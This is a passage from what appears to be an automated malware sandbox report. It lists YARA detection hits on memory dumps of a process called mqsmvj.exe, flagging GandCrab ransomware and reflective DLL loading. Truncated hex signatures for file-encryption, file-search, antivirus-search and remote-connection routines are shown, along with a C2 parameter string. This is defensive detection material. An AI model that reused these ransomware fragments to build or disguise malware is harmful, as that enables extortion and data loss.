28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
38.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
38.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
38.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
38.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
38.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
38.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
30.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
30.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
30.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
30.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
30.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
30.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
39.3.mqsmvj.exe.2fb0000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
39.3.mqsmvj.exe.2fb0000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
39.3.mqsmvj.exe.2fb0000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
39.3.mqsmvj.exe.2fb0000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
39.3.mqsmvj.exe.2fb0000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
39.3.mqsmvj.exe.2fb0000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
22.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
22.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
22.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
22.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
22.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
22.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
37.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
37.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
37.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
37.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
37.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
37.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
37.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
26.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
26.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
26.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
26.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
26.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
26.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
39.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
39.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
39.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
39.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
39.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
39.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
11.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
11.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
11.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
11.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
11.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
11.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
11.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
14.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
14.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
14.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
14.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
14.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
14.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
26.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
26.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
26.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
26.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
26.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
26.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
19.3.mqsmvj.exe.3930000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
19.3.mqsmvj.exe.3930000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
19.3.mqsmvj.exe.3930000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
19.3.mqsmvj.exe.3930000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
19.3.mqsmvj.exe.3930000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
